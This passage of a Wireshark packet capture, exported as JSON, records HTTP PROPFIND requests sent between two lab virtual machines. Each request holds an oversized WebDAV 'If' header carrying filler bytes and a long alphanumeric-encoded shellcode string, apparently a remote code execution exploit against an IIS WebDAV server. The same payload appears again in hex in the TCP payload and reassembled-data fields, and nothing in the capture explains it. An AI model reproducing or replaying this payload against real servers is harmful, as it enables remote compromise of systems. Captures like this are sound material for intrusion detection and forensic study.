c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/cbzEvijiZEPZgVyAOFxvusXzbRVzESwaCyjvWXJhNAQJndywSTqXUWhqaibRuKrJLhHgKKdwvUeGFsvsHc<48><63><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/kKirxCaYGcVHBVzYKqiZWPDpDpcTRuzVorujHVrHhHRksilOayylsuXGqPKwJEOufLZUugOFAuMQgKIHCf<43><66><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "422"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.844478000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.844478000",
|
||
"frame.time_delta": "0.000009000",
|
||
"frame.time_delta_displayed": "0.004511000",
|
||
"frame.time_relative": "17.095418000",
|
||
"frame.number": "430",
|
||
"frame.len": "291",
|
||
"frame.cap_len": "291",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "277",
|
||
"ip.id": "0x0000a4e8",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00008b93",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "42777",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "42777",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "65",
|
||
"tcp.len": "225",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "2435719164",
|
||
"tcp.nxtseq": "1674",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3677191577",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00003cb5",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:6c:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:6c:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868652",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000492000",
|
||
"tcp.analysis.bytes_in_flight": "1673",
|
||
"tcp.analysis.push_bytes_sent": "1673"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000791000",
|
||
"tcp.time_delta": "0.000009000"
|
||
},
|
||
"tcp.payload": "46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "429",
|
||
"tcp.segment": "430",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1673",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:56:72:77:48:5a:6c:5a:4d:53:48:4a:6f:42:44:42:48:6d:73:63:6e:42:70:75:78:4f:47:56:49:73:77:68:54:5a:73:67:70:6e:6f:71:6b:6c:6e:78:79:68:53:49:56:76:65:4b:6a:55:73:55:53:65:4e:53:63:76:67:67:4b:42:6c:6d:64:6b:73:5a:63:4d:44:73:4c:61:51:61:66:44:e4:95:b8:e7:a9:9a:e4:9d:8b:e6:8d:8b:e5:8d:85:e4:85:8b:e4:85:96:e4:91:86:e6:b9:8a:e4:b5:b3:e7:89:8a:e5:81:8f:e4:bd:87:e4:a1:85:e4:bd:b9:e6:91:85:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:b5:99:e6:91:83:e6:ad:89:e6:99:88:e6:bd:95:e7:89:ac:e5:91:a8:e7:95:ae:e6:a9:ba:e6:95:90:e4:95:b7:e6:b1:a7:e4:a1:89:e7:8d:b6:e7:a1:83:e6:b1:8a:e4:9d:a4:e7:95:90:e7:99:84:e4:95:ae:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4b:73:54:58:78:79:76:4f:4c:56:57:45:68:4a:41:65:56:44:75:68:75:57:4b:63:61:65:4b:56:6f:70:49:4f:58:4f:58:79:78:4d:64:56:6a:63:69:58:4e:53:56:69:61:43:4a:73:41:57:61:6c:48:73:47:47:71:76:66:76:4e:77:54:4f:75:62:75:42:47:4b:6c:4d:63:44:6d:58:52:e6:a1:86:e4:a9:85:e4:bd:a4:e7:9d:94:e6:a9:b0:e7:99:92:e6:89:84:e5:8d:b6:e6:a5:95:e7:a5:aa:e6:bd:b3:e7:a1:b1:e6:99:81:e5:9d:85:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:a5:9a:e4:ad:a7:e6:85:93:e6:85:98:e1:8f:80:e6:a0:83:e7:a9:a9:e4:9d:a3:e6:ad:a2:e7:8d:a9:e5:8d:af:e5:81:a7:e6:a1:b3:e4:b1:b9:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/VrwHZlZMSHJoBDBHmscnBpuxOGVIswhTZsgpnoqklnxyhSIVveKjUsUSeNScvggKBlmdksZcMDsLaQafD<66><44><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>